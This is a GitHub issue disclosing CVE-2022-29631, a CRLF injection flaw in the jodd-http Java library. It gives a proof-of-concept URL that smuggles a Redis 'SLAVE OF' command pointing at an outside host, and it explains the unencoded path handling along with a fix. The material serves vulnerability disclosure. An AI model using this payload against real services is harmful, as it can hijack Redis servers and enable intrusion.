Skip to content

CRLF injection vulnerability in jodd-http #9

Closed
@1nhann

Description

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29631

CRLF injection vulnerability in jodd-http

CRLF injection vulnerability in jodd.http.HttpRequest#set and jodd.http.HttpRequest#send in jodd-http version 5.0.x , 5.1.x , 5.2.x , 6.0.x , 6.1.x , 6.2.x ( all versions so far ) , allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL .

Proof of concept :

        <dependency>
            <groupId>org.jodd</groupId>
            <artifactId>jodd-http</artifactId>
            <version>6.2.0</version>
        </dependency>
package top.inhann;

import jodd.http.HttpRequest;
import jodd.http.HttpResponse;

public class Test {
    public static void main(String[] args) {
        String url = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / ";
        HttpRequest req = HttpRequest.get(url);
        HttpResponse res = req.send();
    }
}

run the poc , listen on 127.0.0.1:6379

image-20220418002705451

details :

in jodd.http.HttpRequest#set() when processing path ,this.path(destination); is called ,and it is allowed to inject \r\n in query string and path and fragment .

in jodd.http.HttpRequest#sendTo() , this.buffer(true); is called , and trying to build the http request payload . However , the path , query string , frament and othor components are just appended insecurely , which leads to the crlf injection .

suggestion :

it is recommended to urlencode the invalid characters when constructing the http request payload .

Metadata

Assignees

Labels

bugSomething isn't workinggood first issueGood for newcomers

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions